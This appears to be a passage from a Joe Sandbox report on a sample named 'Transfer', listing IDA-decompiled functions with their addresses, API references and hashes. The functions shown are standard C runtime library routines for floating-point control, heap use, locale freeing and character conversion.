										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x0088cd23
0x0088cd2a
0x0088cd2f
0x0088cd35
0x0088cd38
0x0088cd3e
0x0088cd43
0x0088cd48
0x0088cd48
0x0088cd4e
0x0088cd53
0x0088cd58
0x0088cd58
0x0088cd5f
0x0088cd64
0x0088cd69
0x0088cd69
0x0088cd70
0x0088cd75
0x0088cd7a
0x0088cd7a
0x0088cd81
0x0088cd86
0x0088cd8b
0x0088cd8b
0x0088cd93
0x0088cda3
0x0088cdb5
0x0088cdc7
0x0088cdda
0x0088cdec
0x0088cdf4
0x0088cdf9
0x0088cdfe
0x0088cdfe
0x0088ce05
0x0088ce0a
0x0088ce0a
0x0088ce11
0x0088ce16
0x0088ce16
0x0088ce1d
0x0088ce22
0x0088ce22
0x0088ce29
0x0088ce2e
0x0088ce2e
0x0088ce38
0x0088ce3a
0x0088ce74
0x0088ce3c
0x0088ce41
0x0088ce65
0x0088ce6d
0x0088ce61
0x0088ce61
0x0088ce77
0x0088ce7e
0x0088ce80
0x0088cea2
0x0088ceaa
0x0088cead
0x0088cead
0x0088ceaf
0x0088ceaf
0x0088ceba
0x0088cec0
0x0088cec5
0x0088cecc
0x0088cf06
0x0088cf11
0x0088cf17
0x0088cf1a
0x0088cf1d
0x0088cf29
0x0088cf31
0x0088cece
0x0088ced1
0x0088cedd
0x0088cee3
0x0088cee9
0x0088ceec
0x0088cef5
0x0088cef5
0x0088cf34
0x0088cf42
0x0088cf48
0x0088cf4f
0x0088cf51
0x0088cf51
0x0088cf58
0x0088cf5a
0x0088cf5a
0x0088cf61
0x0088cf63
0x0088cf63
0x0088cf6a
0x0088cf6c
0x0088cf6c
0x0088cf73
0x0088cf75
0x0088cf75
0x0088cf82
0x0088cf85
0x0088cfbc
0x0088cf87
0x0088cf87
0x0088cf8a
0x0088cfb5
0x0088cfaa
0x0088cfaa
0x0088cfbe
0x0088cfc6
0x0088cfc9
0x0088cfe8
0x0088cfed
0x0088cfed
0x0088cfef
0x0088cff4
0x0088d000
0x0088cff6
0x0088cff9
0x0088cff9
0x0088d005
0x0088d005
0x0088cfcb
0x0088cfce
0x0088cfdd
0x00000000
0x0088cfdd
0x0088cfd0
0x0088cfd3
0x0088cfd5
0x0088cfd5
0x00000000
0x0088cfd3
0x0088cf8c
0x0088cf8f
0x0088cfa5
0x00000000
0x0088cfa5
0x0088cf94
0x0088cf96
0x0088cf96
0x0088cf94
0x00000000
0x0088cf85
0x0088ce87
0x0088ce95
0x0088ce9d
0x00000000
0x0088ce9d
0x0088ce8b
0x0088ce90
0x0088ce90
0x00000000
0x0088ce8b
0x0088ce48
0x0088ce56
0x0088ce5e
0x00000000
0x0088ce5e
0x0088ce4c
0x0088ce51
0x0088ce51
0x0088ce4c

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0088CD10,?,?,00000008,?,?,0088C9B0,00000000), ref: 0088CF42

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0805af79b1d3a952bf7e62654804e7c4ee22a400326dd454c00210502221fa82
Instruction ID: e593cd52455b1b30d8c30e34ae87b4ea7b7468e71a9dcffa935cce8e922af3e8
Opcode Fuzzy Hash: 0805af79b1d3a952bf7e62654804e7c4ee22a400326dd454c00210502221fa82
Instruction Fuzzy Hash: 78B19C31210608DFE719DF28C48AB647BE1FF45364F298658E99ACF2A5C735E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00889302 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00889302() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x897358 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00889302
0x0088930a
0x00889312

APIs

GetProcessHeap.KERNEL32 ref: 00889302

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f3562a722c2440bc79917935858529892ff99914db53e8a53db8eb471c00fabf
Instruction ID: 9d996dad270e2fc50fafe5d08b370d2f903ca6d97c15f47eb47a8c8f4c4a14e5
Opcode Fuzzy Hash: f3562a722c2440bc79917935858529892ff99914db53e8a53db8eb471c00fabf
Instruction Fuzzy Hash: 02A01130208280CB83008F38AA882083BE8BA80AA032C002AA808C0220EA208080BB00

Uniqueness

Uniqueness Score: -1.00%

Function 00888F76 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00888F76(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x896648) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00886B10(_t46);
							E00888AF0( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00886B10(_t47);
							E00888BEE( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00886B10( *((intOrPtr*)(_t74 + 0x7c)));
						E00886B10( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00886B10( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00886B10( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00886B10( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00886B10( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E008890E9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x896638) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00886B10(_t31);
							E00886B10( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00886B10(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00886B10(_t74);
			}

0x00888f7e
0x00888f82
0x00888f8a
0x00888f93
0x00888f98
0x00888f9f
0x00888fa7
0x00888faf
0x00888fba
0x00888fc0
0x00888fc1
0x00888fc9
0x00888fd1
0x00888fdc
0x00888fe2
0x00888fe6
0x00888ff1
0x00888ff7
0x00888f98
0x00888ff8
0x00889000
0x00889013
0x00889026
0x00889034
0x0088903f
0x00889044
0x0088904d
0x00889055
0x00889056
0x0088905c
0x0088905f
0x00889062
0x00889069
0x0088906b
0x0088906f
0x00889077
0x0088907e
0x00889084
0x00889085
0x00889085
0x0088908c
0x0088908e
0x00889093
0x0088909b
0x008890a0
0x008890a1
0x008890a1
0x008890a4
0x008890a7
0x008890aa
0x008890ad
0x008890ad
0x008890bf

APIs

___free_lconv_mon.LIBCMT ref: 00888FBA

Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B0D
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B1F
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B31
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B43
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B55
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B67
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B79
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B8B
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888B9D
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888BAF
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888BC1
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888BD3
Part of subcall function 00888AF0: _free.LIBCMT ref: 00888BE5

_free.LIBCMT ref: 00888FAF

Part of subcall function 00886B10: HeapFree.KERNEL32(00000000,00000000,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?), ref: 00886B26
Part of subcall function 00886B10: GetLastError.KERNEL32(?,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?,?), ref: 00886B38

_free.LIBCMT ref: 00888FD1
_free.LIBCMT ref: 00888FE6
_free.LIBCMT ref: 00888FF1
_free.LIBCMT ref: 00889013
_free.LIBCMT ref: 00889026
_free.LIBCMT ref: 00889034
_free.LIBCMT ref: 0088903F
_free.LIBCMT ref: 00889077
_free.LIBCMT ref: 0088907E
_free.LIBCMT ref: 0088909B
_free.LIBCMT ref: 008890B3

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 039cae1d85f56a2b9344e8169af61b7d18b39ca2be072b8704d5cef998748d1d
Instruction ID: e8907eb3dc93415f47c6d2e201dd43701b634d9030937b3616ab898e77b85d15
Opcode Fuzzy Hash: 039cae1d85f56a2b9344e8169af61b7d18b39ca2be072b8704d5cef998748d1d
Instruction Fuzzy Hash: 06311731600601AFEB31BA78D845F6A73E9FF40364F544829E599D7192EF32EDA08B25

Uniqueness

Uniqueness Score: -1.00%

Function 00886F39 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00886F39(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x88fad8) {
					E00886B10(_t52);
					_t26 = _a4;
				}
				E00886B10( *((intOrPtr*)(_t26 + 0x3c)));
				E00886B10( *((intOrPtr*)(_a4 + 0x30)));
				E00886B10( *((intOrPtr*)(_a4 + 0x34)));
				E00886B10( *((intOrPtr*)(_a4 + 0x38)));
				E00886B10( *((intOrPtr*)(_a4 + 0x28)));
				E00886B10( *((intOrPtr*)(_a4 + 0x2c)));
				E00886B10( *((intOrPtr*)(_a4 + 0x40)));
				E00886B10( *((intOrPtr*)(_a4 + 0x44)));
				E00886B10( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00886DFF(5,  &_v8);
				_v8 =  &_a4;
				return E00886E4F(4,  &_v8);
			}

0x00886f3f
0x00886f42
0x00886f4a
0x00886f4d
0x00886f52
0x00886f55
0x00886f59
0x00886f64
0x00886f6f
0x00886f7a
0x00886f85
0x00886f90
0x00886f9b
0x00886fa6
0x00886fb4
0x00886fbc
0x00886fc5
0x00886fcd
0x00886fe1

APIs

_free.LIBCMT ref: 00886F4D

Part of subcall function 00886B10: HeapFree.KERNEL32(00000000,00000000,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?), ref: 00886B26
Part of subcall function 00886B10: GetLastError.KERNEL32(?,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?,?), ref: 00886B38

_free.LIBCMT ref: 00886F59
_free.LIBCMT ref: 00886F64
_free.LIBCMT ref: 00886F6F
_free.LIBCMT ref: 00886F7A
_free.LIBCMT ref: 00886F85
_free.LIBCMT ref: 00886F90
_free.LIBCMT ref: 00886F9B
_free.LIBCMT ref: 00886FA6
_free.LIBCMT ref: 00886FB4

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bfc785c8043cc7c68cb4cbec6d3f21880c39dfaf8bf0f0fc982bb1e31b9eb529
Instruction ID: a57ee729407d9c9ae8b0f72dfa324f802379089f3b02e2f790a30f4e4190cbac
Opcode Fuzzy Hash: bfc785c8043cc7c68cb4cbec6d3f21880c39dfaf8bf0f0fc982bb1e31b9eb529
Instruction Fuzzy Hash: 51115676610108BFCB05FF98C952DDA3BA5FF043A4F5145A5BA08CF222EA31DE609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0088A33F Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0088A33F(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				void* _t80;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x896004; // 0x239cc77c
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0088AB48(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t80);
					return E008825A8(_t80, _v8 ^ _t106, _t99, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00888ED9(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0088848D(_t81, _t85, _v12, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00888ED9(_t101);
									goto L36;
								}
								_t62 = E0088848D(_t81, _t87, _t101, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00888ED9(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00886B4A(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E0088D5B0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0088848D(_t81, 0, _t100, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00886B4A(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0088D5B0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x0088a344
0x0088a345
0x0088a346
0x0088a34d
0x0088a352
0x0088a358
0x0088a35e
0x0088a364
0x0088a367
0x0088a367
0x0088a36a
0x0088a36c
0x0088a36c
0x0088a36a
0x0088a36e
0x0088a373
0x0088a37a
0x0088a37d
0x0088a37d
0x0088a399
0x0088a39f
0x0088a3a4
0x0088a537
0x0088a53a
0x0088a53b
0x0088a53c
0x0088a54a
0x0088a3aa
0x0088a3aa
0x0088a3ad
0x0088a3b2
0x0088a3b6
0x0088a40a
0x0088a40a
0x0088a40c
0x0088a40e
0x0088a52c
0x0088a52c
0x0088a52e
0x0088a52f
0x00000000
0x0088a535
0x0088a41f
0x0088a425
0x0088a427
0x00000000
0x00000000
0x0088a42d
0x0088a43f
0x0088a444
0x0088a448
0x00000000
0x00000000
0x0088a455
0x0088a48f
0x0088a492
0x0088a495
0x0088a497
0x0088a499
0x0088a49b
0x0088a4e7
0x0088a4e7
0x0088a4e9
0x0088a4e9
0x0088a4eb
0x0088a525
0x0088a526
0x00000000
0x0088a52b
0x0088a4ff
0x0088a504
0x0088a506
0x00000000
0x00000000
0x0088a50a
0x0088a50b
0x0088a50c
0x0088a50f
0x0088a54b
0x0088a54e
0x0088a511
0x0088a511
0x0088a512
0x0088a512
0x0088a51f
0x0088a521
0x0088a523
0x0088a554
0x00000000
0x00000000
0x00000000
0x00000000
0x0088a523
0x0088a49d
0x0088a4a0
0x0088a4a2
0x0088a4a4
0x0088a4a6
0x0088a4a9
0x0088a4ae
0x0088a4c9
0x0088a4cb
0x0088a4d5
0x0088a4d7
0x0088a4d8
0x0088a4da
0x00000000
0x00000000
0x0088a4dc
0x0088a4e2
0x0088a4e2
0x00000000
0x0088a4e2
0x0088a4b0
0x0088a4b2
0x0088a4b6
0x0088a4bb
0x0088a4bd
0x0088a4bf
0x00000000
0x00000000
0x0088a4c1
0x00000000
0x0088a4c1
0x0088a457
0x0088a45c
0x00000000
0x00000000
0x0088a462
0x0088a464
0x00000000
0x00000000
0x0088a47b
0x0088a480
0x0088a484
0x00000000
0x00000000
0x00000000
0x0088a48a
0x0088a3bd
0x0088a3bf
0x0088a3c1
0x0088a3c9
0x0088a3e8
0x0088a3ea
0x0088a3f4
0x0088a3f6
0x0088a3f7
0x0088a3f9
0x00000000
0x00000000
0x0088a3ff
0x0088a405
0x0088a405
0x00000000
0x0088a405
0x0088a3cd
0x0088a3d1
0x0088a3d6
0x0088a3da
0x00000000
0x00000000
0x0088a3e0
0x00000000
0x0088a3e0

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0088A590,?,?,00000000), ref: 0088A399
__alloca_probe_16.LIBCMT ref: 0088A3D1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0088A590,?,?,00000000,?,?,?), ref: 0088A41F
__alloca_probe_16.LIBCMT ref: 0088A4B6
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0088A519
__freea.LIBCMT ref: 0088A526

Part of subcall function 00886B4A: RtlAllocateHeap.NTDLL(00000000,0088330B,?), ref: 00886B7C

__freea.LIBCMT ref: 0088A52F
__freea.LIBCMT ref: 0088A554

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 12b9b2f880cfa1481b8361bcf2cd502132d61d58da02b67847bf793fdeaed0bc
Instruction ID: c4587637c94d7f0d3814ddddcc25000bd0e90c639f23d0e391113ebe655a29b9
Opcode Fuzzy Hash: 12b9b2f880cfa1481b8361bcf2cd502132d61d58da02b67847bf793fdeaed0bc
Instruction Fuzzy Hash: A651E172600206AFEF29AFA8DC45EBB77A9FB40714F15422AFD04D6181EB74DC90C792

Uniqueness

Uniqueness Score: -1.00%

Function 0088AC93 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0088AC93(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				intOrPtr _t128;
				signed int _t130;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x896004; // 0x239cc77c
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x897148 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t128 =  *((intOrPtr*)(0x897148 + _v48 * 4));
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						if(( *(E00888ACA(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t130 = _v48;
								 *((char*)( *((intOrPtr*)(0x897148 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x897148 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x897148 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E00889C7C( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00889C7C();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E008825A8(_t115, _v8 ^ _t133, _t131, _t132);
			}

0x0088ac9b
0x0088aca2
0x0088aca5
0x0088acad
0x0088acb1
0x0088acbd
0x0088acc0
0x0088acc3
0x0088acca
0x0088acd2
0x0088acd5
0x0088acdb
0x0088ace1
0x0088ace6
0x0088ace8
0x0088aceb
0x0088acf0
0x0088acfa
0x0088ad01
0x0088ad04
0x0088ad0b
0x0088ad12
0x0088ad3e
0x0088ad64
0x0088ad66
0x00000000
0x0088ad40
0x0088ad43
0x0088ae0a
0x0088ae16
0x0088ae21
0x0088ae26
0x0088ad49
0x0088ad50
0x0088ad55
0x0088ad5b
0x0088ad61
0x00000000
0x0088ad61
0x0088ad5b
0x0088ad43
0x0088ad14
0x0088ad18
0x0088ad1b
0x0088ad21
0x0088ad23
0x0088ad26
0x0088ad2a
0x0088ad67
0x0088ad6a
